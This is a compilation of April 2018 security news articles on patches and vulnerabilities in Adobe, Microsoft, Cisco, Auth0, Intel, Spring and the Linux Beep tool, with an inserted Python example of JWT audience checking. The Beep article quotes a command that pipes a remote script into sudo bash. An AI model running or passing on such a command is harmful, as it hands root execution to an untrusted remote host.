The number of vulnerabilities fixed in Flash Player has dropped significantly since Adobe announced its intention to kill the application in 2020. However, malicious actors have not given up trying to find security holes they can exploit. In February, Adobe issued an emergency update to address a zero-day used by North Korean hackers.

The April Patch Tuesday updates from Adobe also cover Experience Manager, in which the company patched three moderate and important cross-site scripting (XSS) flaws.

An update has also been released for Adobe InDesign CC to fix a critical memory corruption that allows arbitrary code execution via specially crafted .inx files, and an untrusted search path issue in the installer that can lead to privilege escalation.

The latest version of Adobe Digital Editions resolves an out-of-bounds read vulnerability and a stack overflow, both of which can result in disclosure of information.

ColdFusion version 11 and the 2016 release have also received security updates. A total of five flaws have been patched, including local privilege escalation, remote code execution and information disclosure issues.

Finally, the Adobe PhoneGap Push plugin has been updated to address a same-origin method execution bug that exposes apps built with the affected plugin to JavaScript code execution.


Microsoft Patches Two Dozen Critical Flaws in Windows, Browsers
11.4.2018 securityweek 
Vulnerebility

Microsoft’s Patch Tuesday updates for April 2018 resolve a total of 66 vulnerabilities, including nearly two dozen critical issues affecting Windows and the company’s web browsers.

None of the flaws patched this month appear to have been exploited in the wild, but one privilege escalation vulnerability discovered by a Microsoft researcher in SharePoint has been disclosed to the public.

A majority of the critical flaws affecting Internet Explorer and Edge are related to scripting engines and they allow remote code execution.

A remote code execution flaw affecting the VBScript engine has also been rated critical. The security hole can be exploited via malicious websites or documents. Trend Micro’s Zero Day Initiative (ZDI) noted that while this is similar to browser bugs, the attack surface is broader due to the possibility of exploitation using Office documents.

Several critical vulnerabilities that allow remote code execution have also been found in graphics components, specifically font libraries and how they handle embedded fonts.

“Since there are many ways to view fonts – web browsing, documents, attachments – it’s a broad attack surface and attractive to attackers. Given the history of malicious fonts, these patches should be high on your test and deployment list. This is also a good time to remind you to not do day-to-day tasks as an administrator,” ZDI’s Dustin Childs explained in a blog post.

Microsoft also informed customers that its Wireless Keyboard 850 is affected by a security feature bypass vulnerability that can be exploited to simulate keystrokes and send malicious commands to the targeted computer. An attacker could also exploit this flaw to read keystrokes, which can include sensitive information, such as passwords.

“[The vulnerability] could allow an attacker to reuse an AES encryption key to send keystrokes to other keyboard devices or to read keystrokes sent by other keyboards for the affected devices. An attacker would first have to extract the AES encryption key from the affected keyboard device. The attacker would also need to maintain physical proximity – within wireless range – of the devices for the duration of the attack,” Microsoft said.

Adobe’s Patch Tuesday updates address a total of 19 vulnerabilities across six products. Six flaws have been fixed in Flash Player, which Microsoft also resolved in Windows.

Earlier this month, Microsoft announced the release of an update for its Malware Protection Engine to patch a critical vulnerability that could have been exploited to take control of a system by placing a malicious file in a location where it would be scanned.


Adobe April Security Bulletin Tuesday fixed 4 critical flaws in Flash
11.4.2018 securityaffairs
Vulnerebility

Adobe's April Security Bulletin is out; the company has addressed four critical vulnerabilities in Flash Player.
Adobe April Security Bulletin has addressed a total of 19 vulnerabilities in its products, including Flash Player, Experience Manager, InDesign CC, Digital Editions, ColdFusion and the PhoneGap Push plugin.

The company has released the Flash Player version 29.0.0.140 that fixed four critical flaws and two issues rated as important.

The flaws addressed in Adobe's April Security Bulletin include use-after-free, out-of-bounds read, out-of-bounds write and heap overflow bugs that could be exploited by remote attackers to execute arbitrary code on the target system or to obtain information disclosure.

“Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address critical vulnerabilities in Adobe Flash Player 29.0.0.113 and earlier versions. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

The vulnerability details are below:

Vulnerability Category   Vulnerability Impact     Severity    CVE Number
Use-After-Free           Remote Code Execution    Critical    CVE-2018-4932
Out-of-bounds read       Information Disclosure   Important   CVE-2018-4933
Out-of-bounds read       Information Disclosure   Important   CVE-2018-4934
Out-of-bounds write      Remote Code Execution    Critical    CVE-2018-4935
Heap Overflow            Information Disclosure   Important   CVE-2018-4936
Out-of-bounds write      Remote Code Execution    Critical    CVE-2018-4937
Adobe acknowledged Google white hat hackers Mateusz Jurczyk and Natalie Silvanovich of Google Project Zero for reporting the CVE-2018-4936, CVE-2018-4935, CVE-2018-4934 and CVE-2018-4937 flaws.

The CVE-2018-4933 vulnerability was reported by willJ of Tencent PC Manager, while the CVE-2018-4932 flaw was reported by Lin Wang of Beihang University.

The good news is that according to Adobe, there is no evidence of malicious exploitation in the wild.

Adobe also addressed three moderate and important cross-site scripting (XSS) flaws in the Experience Manager.

Adobe also fixed a critical memory corruption flaw (CVE-2018-4928) in Adobe InDesign CC that was reported by Honggang Ren of Fortinet’s FortiGuard Labs. Ren discovered a memory corruption flaw that could be exploited for arbitrary code execution.

Adobe also fixed an out-of-bounds read vulnerability and a stack overflow issue in Adobe Digital Editions and five flaws in ColdFusion.

The last issue covered by the company is a same-origin method execution bug in the Adobe PhoneGap Push plugin.


Booby-trapped Office docs build with ThreadKit trigger CVE-2018-4878 flaw
10.4.2018 securityaffairs
Vulnerebility

Microsoft Office documents created with the exploit builder kit dubbed ThreadKit now include the code for CVE-2018-4878 flaw exploitation.
At the end of March, security experts at Proofpoint discovered a Microsoft Office document exploit builder kit dubbed ThreadKit that has been used to spread a variety of malware, including banking Trojans and RATs (Trickbot, Chthonic, FormBook and Loki Bot).

The exploit kit was first discovered in October 2017, but according to the experts, crooks have been using it since at least June 2017.

The ThreadKit builder kit shows similarities to Microsoft Word Intruder (MWI); it was initially advertised in a forum post as a builder for weaponized decoy documents.

Just after its appearance, documents created with the ThreadKit builder kit have been observed in several campaigns.

Now threat actors are using the ThreadKit builder kit to target the recently patched CVE-2018-4878 Flash vulnerability; experts started observing exploit code samples in the wild a few days ago.

Adobe addressed the CVE-2018-4878 in February after North Korea’s APT group was spotted exploiting it in targeted attacks.

The vulnerability could be exploited by an attacker by tricking victims into opening a document, web page or email containing a specially crafted Flash file.

According to the researcher Simon Choi the Flash Player flaw has been exploited by North Korea since mid-November 2017. The attackers exploited the zero-day vulnerability in attacks aimed at South Korean individuals involved in research activity on North Korea.

The exploit has now been included in the ThreadKit builder, according to VirusTotal hashes posted to Pastebin.

Security expert Claes Splett has published a video that shows how to build a CVE-2018-4878 exploit in ThreadKit.

Proofpoint experts reported that in recent weeks the exploit kit added new exploits targeting vulnerabilities such as the CVE-2018-4878 Adobe Flash zero-day and several Microsoft Office vulnerabilities (CVE-2018-0802 and CVE-2017-8570).


Linux open source utility Beep is affected by several vulnerabilities
10.4.2018 securityaffairs
Vulnerebility

Researchers have discovered several vulnerabilities in the Linux command line tool Beep; some experts suggest removing the utility from distributions.
An unnamed security researcher has found several vulnerabilities in the Linux command line tool Beep, including a severe flaw introduced by a patch for a privilege escalation vulnerability.

Beep is a small open source utility that Linux developers have used to produce a beep with a computer’s internal speaker; it allows users to control the pitch, duration and repetitions of the sound.

The researcher discovered a race condition in the utility that could be exploited by an attacker to escalate privileges to root. Versions through 1.3.4 are affected by the flaw that was tracked as CVE-2018-0492.

Further information on the flaw is available on the website holeybeep.ninja.

Is your system vulnerable? In order to discover if a system is vulnerable it is possible to run the following command:

curl https://holeybeep.ninja/am_i_vulnerable.sh | sudo bash

A vulnerable machine will beep.

The Holey Beep website also provides a patch, but experts noticed that it actually introduces a potentially more serious vulnerability that could be exploited to execute arbitrary code on the patched system.

“The patch vulnerability seems more severe to me, as people apply patches all the time (they shouldn’t do it as root, but people are people),” reads a message published by Tony Hoyle on the Debian bug tracker. “It’s concerning that the holeybeep.ninja site exploited an unrelated fault for ‘fun’ without apparently telling anyone.”

Beep is also affected by other issues, including integer overflow vulnerabilities and a flaw that can reveal information about files on the system.

Pending a code review of the utility, it is probably time to remove it from distributions, since the PC speaker doesn’t exist in most modern systems.


Vulnerabilities Found in Linux 'Beep' Tool
9.4.2018 securityweek
Vulnerebility

Several vulnerabilities have been found in the Linux command line tool Beep, including a potentially serious issue introduced by a patch for a privilege escalation flaw.

For well over a decade, Beep has been used by developers on Linux to get a computer’s internal speaker to produce a beep. What makes Beep useful for certain programs is the fact that it allows users to control the pitch, duration and repetitions of the sound. The open source application has not received any updates since 2013.

An unnamed researcher discovered recently that Beep versions through 1.3.4 are affected by a race condition that allows a local attacker to escalate privileges to root.

The security hole has been assigned CVE-2018-0492 and it has been sarcastically described as “the latest breakthrough in the field of acoustic cyber security research.” Someone created a dedicated website for it (holeybeep.ninja), a logo, and named it “Holey Beep.”

The individual or individuals who set up the Holey Beep website have also provided a patch, but someone noticed that this fix actually introduces a potentially more serious vulnerability that allows arbitrary command execution.

“The patch vulnerability seems more severe to me, as people apply patches all the time (they shouldn't do it as root, but people are people),” Tony Hoyle explained in a post on the Debian bug tracker. “It's concerning that the holeybeep.ninja site exploited an unrelated fault for 'fun' without apparently telling anyone.”

Furthermore, reports of other security issues affecting Beep emerged over the weekend, along with claims that the fix is incomplete. Beep is also said to be affected by some integer overflow bugs, and a vulnerability that can be exploited to obtain information about files on a system and conduct unauthorized activities.

“I question whether beep should be saved. It would require someone carefully reviewing the code and effectively become the new upstream. And all that for a tool talking to the PC speaker, which doesn't exist in most modern systems anyway,” said German researcher and journalist Hanno Böck. “Instead distros should consider not installing it as suid or just killing the package altogether. I heard some distros (suse) replace beep with a simple ‘printf '\a’ which seems also a safe solution. (although it obviously kills all frequency/length/etc features of original ‘beep’).”


Cisco Switches in Iran, Russia Hacked in Apparent Pro-US Attack
9.4.2018 securityweek
Attack  Vulnerebility

A significant number of Cisco switches located in Iran and Russia have been hijacked in what appears to be a hacktivist campaign conducted in protest of election-related hacking. However, it’s uncertain if the attacks involve a recently disclosed vulnerability or simply abuse a method that has been known for more than a year.

Cisco devices belonging to organizations in Russia and Iran have been hijacked via their Smart Install feature. The compromised switches had their IOS image rewritten and their configuration changed to display a U.S. flag using ASCII art and the message “Don’t mess with our elections…”

The hackers, calling themselves “JHT,” told Motherboard that they wanted to send a message to government-backed hackers targeting “the United States and other countries.” They claim to have only caused damage to devices in Iran and Russia, while allegedly patching most devices found in countries such as the U.S. and U.K.

Iran’s Communication and Information Technology Ministry stated that the attack had impacted roughly 3,500 switches in the country, but said a vast majority were quickly restored.

Cisco switch hacked via Smart Install

Kaspersky Lab reported that the attack appeared to mostly target the “Russian-speaking segment of the Internet.”

While there are some reports that the attack involves a recently patched remote code execution vulnerability in Cisco’s IOS operating system (CVE-2018-0171), that might not necessarily be the case.

The Cisco Smart Install Client is a legacy utility that allows no-touch installation of new Cisco switches. Roughly one year ago, the company warned customers about misuse of the Smart Install protocol following a spike in Internet scans attempting to detect unprotected devices that had this feature enabled.

Attacks, including ones launched by nation-state threat actors such as the Russia-linked Dragonfly, abused the fact that many organizations had failed to securely configure their switches, rather than an actual vulnerability.

Cisco issued a new warning last week as the disclosure of CVE-2018-0171 increases the risk of attacks, but the networking giant said it had not actually seen any attempts to exploit this vulnerability in the wild. Cisco’s advisory for this flaw still says there is no evidence of malicious exploitation.

There are hundreds of thousands of Cisco switches that can be hijacked by abusing the Smart Install protocol, and Cisco Talos experts believe attackers are unlikely to bother using CVE-2018-0171.

Cisco expert on CVE-2018-0171 exploitation

The Network Security Research Lab at Chinese security firm Qihoo 360 says the data from its honeypot shows that the attacks have “nothing to do with CVE-2018-0171” and instead rely on a publicly available Smart Install exploitation tool released several months ago.

While none of the major players in the infosec industry have confirmed that the attacks on Iran and Russia rely on CVE-2018-0171, technical details and proof-of-concept (PoC) code have been made available by researchers, making it easier for hackers to exploit.

Hamed Khoramyar, founder of Sweden-based ICT firm Aivivid, said the attacks exploited CVE-2018-0171. Kudelski Security also reported seeing attacks involving both CVE-2018-0171 and another recently disclosed IOS vulnerability tracked as CVE-2018-0156. However, Kudelski’s blog post also lists Khoramyar as one of its sources.


Auth0 authentication bypass issue exposed enterprises to hack
9.4.2018 securityaffairs
Vulnerebility

Auth0, one of the biggest identity-as-a-service platforms, is affected by a critical authentication bypass vulnerability that exposed enterprises to hack.
Auth0, one of the biggest identity-as-a-service platforms, is affected by a critical authentication bypass vulnerability that could be exploited by attackers to access any portal or application that uses it for authentication.

Auth0 implements a token-based authentication model for a large number of platforms; it handles 42 million logins every day and billions of logins per month for over 2000 enterprise customers.


In September 2017, researchers from security firm Cinta Infinita discovered a flaw in Auth0’s Legacy Lock API while they were pentesting an unnamed application that used the service for authentication.

The vulnerability, tracked as CVE-2018-6873, is related to improper validation of the JSON Web Token (JWT) audience parameter.

The experts exploited this issue to bypass login authentication using a cross-site request forgery (CSRF/XSRF) attack that triggers the CVE-2018-6874 flaw against applications implementing Auth0 authentication.

The experts exploited the CSRF vulnerability to reuse a valid signed JWT generated for a separate account to access the targeted victim’s account.

The only information attackers need is the victim’s user ID or email address, which could easily be obtained through social engineering.

“So, now we had the ability to forge a valid signed JWT with the “email” and “user_id” of the victim.” reads the analysis of the experts.

“It worked!! Why? The audience claim was not being checked and JWTs generated from our test application were accepted by the Management Console app (same signing key / private certificate).”

Below is a video PoC of the attack demonstrating how to obtain the victim’s user ID and bypass password authentication when logging into Auth0’s Management Dashboard by forging an authentication token.

The researchers explained that it is possible to use this attack against many organizations.

“Could we use this attack to access arbitrary applications? Yes, as long as we know the expected fields and values for the JWT. There is no need of social engineering in most of the cases we saw. Authentication for applications that use an email address or an incremental integer for user identification would be trivially bypassed.” continues the analysis.
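The root cause quoted above, a verifier that checks the signature but not the audience, is easy to show in code. The following is an added illustration, not code from Cinta Infinita or Auth0: a minimal JWT verifier written in Python with the standard library only, assuming HS256 (a shared HMAC key) to keep it self-contained; the key and client identifiers are constructed placeholders.

```python
"""Minimal HS256 JWT verifier contrasting a signature-only check with one that
also validates the aud claim. Added illustration; key and client identifiers
are constructed placeholders, not Auth0's real values."""
import base64
import hashlib
import hmac
import json
import time

# Constructed placeholders: one tenant-wide signing key shared by two apps.
SHARED_KEY = b"constructed-tenant-signing-key"
TEST_APP_AUD = "test-app-client-id"           # application the token was issued for
CONSOLE_AUD = "management-console-client-id"  # application the token is presented to


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: dict, key: bytes) -> str:
    """Mint a compact JWT (header.payload.signature) with HMAC-SHA256."""
    header = {"alg": "HS256", "typ": "JWT"}
    segments = [
        _b64url(json.dumps(header, separators=(",", ":")).encode()),
        _b64url(json.dumps(claims, separators=(",", ":")).encode()),
    ]
    signing_input = ".".join(segments).encode("ascii")
    sig = hmac.new(key, signing_input, hashlib.sha256).digest()
    return ".".join(segments + [_b64url(sig)])


def _checked_claims(token: str, key: bytes) -> dict:
    """Verify signature and expiry and return the claims; ValueError on failure."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") != "HS256":  # only accept the algorithm we expect
        raise ValueError("unexpected alg")
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    expected = hmac.new(key, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(_b64url_decode(payload_b64))
    if claims.get("exp", 0) < time.time():
        raise ValueError("token expired")
    return claims


def verify_signature_only(token: str, key: bytes) -> dict:
    """Weak pattern described in the article: any token validly signed with the
    shared key is accepted, regardless of which application it was issued for."""
    return _checked_claims(token, key)


def verify_for_audience(token: str, key: bytes, expected_aud: str) -> dict:
    """Hardened pattern: additionally require aud to name this application.
    RFC 7519 allows aud to be a string or an array of strings; both are handled."""
    claims = _checked_claims(token, key)
    aud = claims.get("aud")
    if isinstance(aud, str):
        aud = [aud]
    if not isinstance(aud, list) or expected_aud not in aud:
        raise ValueError("audience mismatch")
    return claims


def _accepts(verify, *args) -> bool:
    try:
        verify(*args)
        return True
    except ValueError:
        return False


def demo() -> dict:
    """Present a token minted for the test app to the console's verifiers, and
    confirm a token genuinely issued for the console still passes the strict one."""
    now = int(time.time())
    cross_app_token = sign_hs256(
        {"sub": "user-id-placeholder", "email": "user@example.invalid",
         "aud": TEST_APP_AUD, "iat": now, "exp": now + 3600}, SHARED_KEY)
    genuine_token = sign_hs256(
        {"sub": "user-id-placeholder", "aud": CONSOLE_AUD,
         "iat": now, "exp": now + 3600}, SHARED_KEY)
    return {
        "signature_only_accepts_cross_app":
            _accepts(verify_signature_only, cross_app_token, SHARED_KEY),
        "audience_check_accepts_cross_app":
            _accepts(verify_for_audience, cross_app_token, SHARED_KEY, CONSOLE_AUD),
        "audience_check_accepts_genuine":
            _accepts(verify_for_audience, genuine_token, SHARED_KEY, CONSOLE_AUD),
    }


if __name__ == "__main__":
    print(demo())
```

The same check applies to asymmetric signatures (RS256 with a tenant-wide key pair): a valid signature proves who issued the token, and only the aud claim proves whom it was issued for.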

Security firm Cinta Infinita reported the vulnerability to the company in October 2017. Auth0 fixed the issue within a few hours, but it took several months to reach every customer using the vulnerable SDK and supported Auth0 libraries.

“We waited for six months before publicly disclosing this issue so that Auth0 could update all their Private SaaS Appliances (on-premise) as well.” continues the analysis.

“Auth0 published a blog post about their internal vulnerability management and remediation process where they mention our finding and the assistance we provided: https://auth0.com/blog/managing-and-mitigating-security-vulnerabilities-at-auth0/”


Critical flaw leaves thousands of Cisco Switches vulnerable to remote hacking
8.4.2018 thehackernews
Vulnerebility

Security researchers at Embedi have disclosed a critical vulnerability in Cisco IOS Software and Cisco IOS XE Software that could allow an unauthenticated, remote attacker to execute arbitrary code, take full control over the vulnerable network equipment and intercept traffic.
The stack-based buffer overflow vulnerability (CVE-2018-0171) is caused by improper validation of packet data in the Smart Install Client, a plug-and-play configuration and image-management feature that helps administrators deploy (client) network switches easily.


Embedi has published technical details and Proof-of-Concept (PoC) code after Cisco today released patch updates to address this remote code execution vulnerability, which has been given a base Common Vulnerability Scoring System (CVSS) score of 9.8 (critical).
Researchers found a total of 8.5 million devices with the vulnerable port open on the Internet, leaving approximately 250,000 unpatched devices open to hackers.
To exploit this vulnerability, an attacker needs to send a crafted Smart Install message to an affected device on TCP port 4786, which is opened by default.
"To be more precise, the buffer overflow takes place in the function smi_ibc_handle_ibd_init_discovery_msg" and "because the size of the data copied to a fixed-size buffer is not checked, the size and data are taken directly from the network packet and are controlled by an attacker," Cisco explains in its advisory.
The vulnerability can also result in a denial-of-service condition (watchdog crash) by triggering an indefinite loop on the affected devices.


Researchers demonstrated the vulnerability at a conference in Hong Kong after reporting it to Cisco in May 2017.
Video Demonstrations of the Attack:
In their first demonstration, as shown in the video below, researchers targeted a Cisco Catalyst 2960 switch to reset/change the password and enter privileged EXEC mode:


In their second demo, researchers exploited the flaw to successfully intercept the traffic between other devices connected to the vulnerable switch and the Internet.

Affected Hardware and Software:
The vulnerability was tested on Catalyst 4500 Supervisor Engines, Cisco Catalyst 3850 Series Switches, and Cisco Catalyst 2960 Series Switches, but all devices that fall into the Smart Install Client type are potentially vulnerable, including:
Catalyst 4500 Supervisor Engines
Catalyst 3850 Series
Catalyst 3750 Series
Catalyst 3650 Series
Catalyst 3560 Series
Catalyst 2960 Series
Catalyst 2975 Series
IE 2000
IE 3000
IE 3010
IE 4000
IE 4010
IE 5000
SM-ES2 SKUs
SM-ES3 SKUs
NME-16ES-1G-P
SM-X-ES3 SKUs
Cisco fixed the vulnerability in all of its affected products on 28th March 2018, and Embedi published a blog post detailing the vulnerability on 29th March. Administrators are therefore strongly advised to install the free software updates addressing the issue as soon as possible.


Intel Admits It Won't Be Possible to Fix Spectre (V2) Flaw in Some Processors

8.4.2018 thehackernews Vulnerebility

As speculated by the researcher who disclosed the Meltdown and Spectre flaws in Intel processors, some Intel processors will not receive patches for the Spectre (variant 2) side-channel analysis attack.
In a recent microcode revision guidance (PDF), Intel admits that it would not be possible to address the Spectre design flaw in its specific old CPUs, because it requires changes to the processor architecture to mitigate the issue fully.
The chip maker has marked the production status of a total of 9 product families as "Stopped": Bloomfield, Clarksfield, Gulftown, Harpertown Xeon, Jasper Forest, Penryn, SoFIA 3GR, Wolfdale, and Yorkfield.
These vulnerable chip families, most of which went on sale between 2007 and 2011, will no longer receive microcode updates, leaving more than 230 Intel processor models, which power millions of computers and mobile devices, vulnerable to hackers.
According to the revised guidance, "after a comprehensive investigation of the microarchitectures and microcode capabilities for these products, Intel has determined to not release microcode updates for these products for one or more reasons."
Intel mentions three reasons in its documentation for not addressing the flaw in some of the impacted products:
Micro-architectural characteristics that preclude a practical implementation of features mitigating Variant 2 (CVE-2017-5715)
Limited Commercially Available System Software support
Based on customer inputs, most of these products are implemented as "closed systems" and therefore are expected to have a lower likelihood of exposure to these vulnerabilities.
The Spectre variant 2 vulnerability (CVE-2017-5715) affects systems whose microprocessors use speculative execution and indirect branch prediction, allowing a malicious program to read sensitive information, such as passwords and encryption keys, including data belonging to the kernel, using a side-channel analysis attack.
However, these processors can install pre-mitigation production microcode updates to mitigate Variant 1 (Spectre) and Variant 3 (Meltdown) flaws.
"We've now completed release of microcode updates for Intel microprocessor products launched in the last 9+ years that required protection against the side-channel vulnerabilities discovered by Google. However, as indicated in our latest microcode revision guidance, we will not be providing updated microcode for a select number of older platforms for several reasons, including limited ecosystem support and customer feedback." said an Intel spokesperson via email.
Besides Intel, AMD Ryzen and EPYC processors were also found vulnerable to 13 critical vulnerabilities that could allow an unauthorized attacker to access sensitive data, install persistent malware inside the chip, and gain full access to the compromised systems.
AMD has acknowledged the reported vulnerabilities and promised to roll out firmware patches for millions of affected devices in the coming weeks.
However, CTS Labs, the security firm that discovered and disclosed the vulnerabilities, claimed that AMD could take several months to release patches for most of the security issues, and that some of them cannot be fixed.


Critical Flaws Expose Natus Medical Devices to Remote Attacks
7.4.2018 securityweek 
Vulnerebility

Researchers at Cisco Talos have identified several critical vulnerabilities that expose Natus medical devices to remote hacker attacks. The vendor has released firmware updates that patch the flaws.

The vulnerabilities allow remote code execution and denial-of-service (DoS) attacks and they impact the Natus NeuroWorks software, which is used by the company’s Xltek electroencephalography (EEG) equipment to monitor and review data over the network.

According to Cisco, an attacker with access to the targeted network can remotely execute arbitrary code on the device or cause a service to crash by sending specially crafted packets. An attack does not require authentication.

“Vulnerable systems are searched for by attackers as points of ingress and persistence within computer networks. A vulnerable system can be compromised by threat actors, used to conduct reconnaissance on the network, and as a platform from which further attacks can be launched,” Talos warned.

Remote code execution on vulnerable Natus devices is possible due to four different functions that can cause a buffer overflow. All of the code execution flaws have been rated “critical” with CVSS scores of 9 or 10. The DoS vulnerability, rated “high severity,” is caused by an out-of-bounds read issue.

Cisco said it reported the vulnerabilities to Natus in July 2017, but the bugs were only confirmed in October. The flaws have been tested on Natus Xltek NeuroWorks 8 and they have been patched with the release of NeuroWorks 8.5 GMA2.

Healthcare facilities that use the affected products have been advised to install the update as soon as possible. The risk of attacks involving these vulnerabilities is relatively high considering that the devices are widely deployed – Natus was recently reported to have a 60 percent share in the global neurodiagnostic market. Furthermore, Cisco has made available technical information for each of the vulnerabilities.

The healthcare industry has been increasingly targeted by malicious actors, including in attacks involving ransomware and theft of sensitive information. The infosec community and authorities have issued numerous warnings, and recent reports show that there are plenty of healthcare product vulnerabilities that hackers could exploit in their operations.


A Remote Code Execution Vulnerability found in the Spring Framework. Upgrade it now!
7.4.2018 securityaffairs
Vulnerebility

Security experts have discovered a vulnerability in the Spring Framework that could be exploited by a remote attacker to execute arbitrary code on applications built with it.
Security researchers have discovered three vulnerabilities in the Spring development framework; one of them could be exploited by a remote attacker to execute arbitrary code on applications built with it.

Pivotal’s Spring is a widely used open source framework for the development of web applications. Affected Spring Framework versions are 5.0 to 5.0.4, 4.3 to 4.3.14, and older versions.

The security advisory published by Pivotal includes technical details of the following three vulnerabilities:

CVE-2018-1270: Remote Code Execution with spring-messaging, rated as “Critical”.
“Spring Framework versions 5.0 to 5.0.4, 4.3 to 4.3.14, and older unsupported versions allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module.” reads the advisory.

An attacker can send specially crafted messages to the broker in order to trigger the remote code execution flaw.

CVE-2018-1271: Directory Traversal with Spring MVC on Windows, rated as “High”.
“Spring Framework versions 5.0 to 5.0.4, 4.3 to 4.3.14, and older unsupported versions allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images).” reads the advisory.

An attacker can use a specially crafted URL to launch a directory traversal attack.

CVE-2018-1272: Multipart Content Pollution with Spring Framework, rated as “Low”.
“When a Spring MVC or Spring WebFlux server application (server A) receives input from a remote client, and then uses that input to make a multipart request to another server (server B), it can be exposed to an attack, where an extra multipart is inserted in the content of the request from server A, causing server B to use the wrong value for a part it expects. This could lead to privilege escalation, for example, if the part content represents a username or user roles.” reads the advisory.

An attacker who is able to guess the multipart boundary value chosen by server A for the multipart request to server B could exploit the issue. This means that the attacker needs to gain control of the server, or find a way to see the HTTP log of server A through a separate attack vector.


The above issues are addressed in Spring Framework 5.0.5 and 4.3.15. Pivotal also released Spring Boot 2.0.1 and 1.5.11.0.

Development teams need to upgrade their software to the latest versions as soon as possible.


Intel Discontinues Keyboard App Affected by Critical Flaws
6.4.2018 securityweek 
Vulnerebility

Serious vulnerabilities have been found in Intel’s Remote Keyboard application, but the company will not release any patches and instead advised users to uninstall the app.

Introduced in June 2015, the Intel Remote Keyboard apps for Android and iOS allow users to wirelessly control their Intel NUC and Compute Stick devices from a smartphone or tablet. The Android application has been installed more than 500,000 times.

Researchers discovered recently that all versions of Intel Remote Keyboard are affected by three severe privilege escalation flaws.

The most serious of them, rated “critical” and identified as CVE-2018-3641, allows a network attacker to inject keystrokes as a local user. The vulnerability was reported to Intel by a UK-based researcher who uses the online moniker trotmaster.

Another vulnerability, tracked as CVE-2018-3645 and rated “high severity,” was reported to Intel by Mark Barnes. The researcher discovered that Intel Remote Keyboard is affected by a privilege escalation flaw that allows a local attacker to inject keystrokes into another keyboard session.

The third security hole is CVE-2018-3638, which allows an authenticated, local attacker to execute arbitrary code with elevated privileges. Intel has credited Marius Gabriel Mihai for finding this vulnerability.

Intel does not plan on releasing patches for these vulnerabilities. The company has decided to discontinue the product and advised users to uninstall the apps at their earliest convenience. Intel Remote Keyboard has been removed from both Google Play and the Apple App Store.

Intel also published a security advisory this week to warn customers of an important denial-of-service (DoS) vulnerability affecting the SPI Flash component in multiple processors. The flaw was discovered by Intel itself and mitigations are available.

The company also informed users of a privilege escalation flaw in 2G modems, including XMM71xx, XMM72xx, XMM73xx, XMM74xx, Sofia 3G, Sofia 3G-R, and Sofia 3G-RW. The issue impacts devices that have the Earthquake Tsunami Warning System (ETWS) feature enabled.

A network attacker can exploit the vulnerability to execute arbitrary code. “Devices equipped with an affected modem, when connected to a rogue 2G base station where non-compliant 3GPP software may be operational, are potentially at risk,” Intel said.

The company says it has developed patches for this vulnerability.

“External researchers reported a potential security vulnerability in the implementation of the Earthquake and Tsunami Warning System (ETWS) in certain Intel 2G modem firmware implementations. Intel has developed firmware updates that address the issue, and we have been working closely with our customers and partners to deploy the updates to affected products as soon as possible,” Intel told SecurityWeek in an emailed statement.


Intel Will Not Patch Spectre in Some CPUs
5.4.2018 securityweek
Vulnerebility

Intel has informed customers that some of the processors affected by the Meltdown and Spectre vulnerabilities will not receive microcode updates due to issues related to implementation and other factors.

Two weeks after announcing that microcode updates have been made available for all recent processors vulnerable to speculative execution side-channel attacks, Intel updated its microcode revision guidance to say that some chips will not receive patches.

The list includes Core, Xeon, Celeron, Pentium, and Atom processors with Bloomfield (Xeon), Clarksfield, Gulftown, Harpertown Xeon, Jasper Forest, Penryn/QC, SoFIA 3GR, Wolfdale (Xeon) and Yorkfield (Xeon) microarchitectures. These products have been assigned a “stopped” status, which indicates they will not receive updates due to one or more reasons.

Intel says it has conducted a comprehensive investigation of the microarchitecture and microcode capabilities of these CPUs and determined that some of their characteristics prevent a practical implementation of mitigations for Spectre Variant 2 (CVE-2017-5715).

Other possible reasons for not releasing fixes include limited commercially available system software support and low risk of attacks.

“Based on customer inputs, most of these products are implemented as ‘closed systems’ and therefore are expected to have a lower likelihood of exposure to these vulnerabilities,” Intel explained.

Intel revealed recently that its upcoming processors for data centers and PCs will include built-in protections against Meltdown (Variant 3) and Spectre (Variant 2) attacks. The chip giant expects to roll out these protections in the second half of 2018.

“We have redesigned parts of the processor to introduce new levels of protection through partitioning that will protect against both Variants 2 and 3,” explained Intel CEO Brian Krzanich. “Think of this partitioning as additional ‘protective walls’ between applications and user privilege levels to create an obstacle for bad actors.”

Dozens of lawsuits have been filed against Intel by customers and shareholders over the disclosure and handling of Meltdown and Spectre.


Google Patches 9 Critical Android Vulnerabilities in April 2018 Update
5.4.2018 securityweek
Vulnerebility  Android

Google this week released its April 2018 set of Android security patches, which addresses more than two dozen Critical and High severity vulnerabilities.

19 vulnerabilities were found to affect components such as Android runtime, Framework, Media framework, and System. These include 7 issues rated Critical and 12 considered High risk. All of the flaws were patched as part of the 2018-04-01 security patch level.

Successful exploitation of these security bugs could result in elevation of privileges, information disclosure, remote code execution, and denial of service.

“The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process,” Google notes in its advisory.

Six of the Critical severity bugs were remote code execution vulnerabilities, while the seventh was an elevation of privilege flaw. Impacted platform versions include Android 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, and 8.1.

Google also addressed 9 vulnerabilities as part of the 2018-04-05 security patch level, namely 2 Critical and 7 High severity. The issues impact Broadcom, Kernel, and Qualcomm components.

Both Critical bugs are remote code execution flaws, while the High severity issues include elevation of privilege and information disclosure vulnerabilities.

“The most severe vulnerability in this section could enable a proximate attacker using a specially crafted file to execute arbitrary code within the context of a privileged process,” Google notes.

The 2018-04-05 security patch level also includes patches for 34 vulnerabilities in Qualcomm closed-source components: 6 rated Critical and 28 assessed with a High risk severity level.

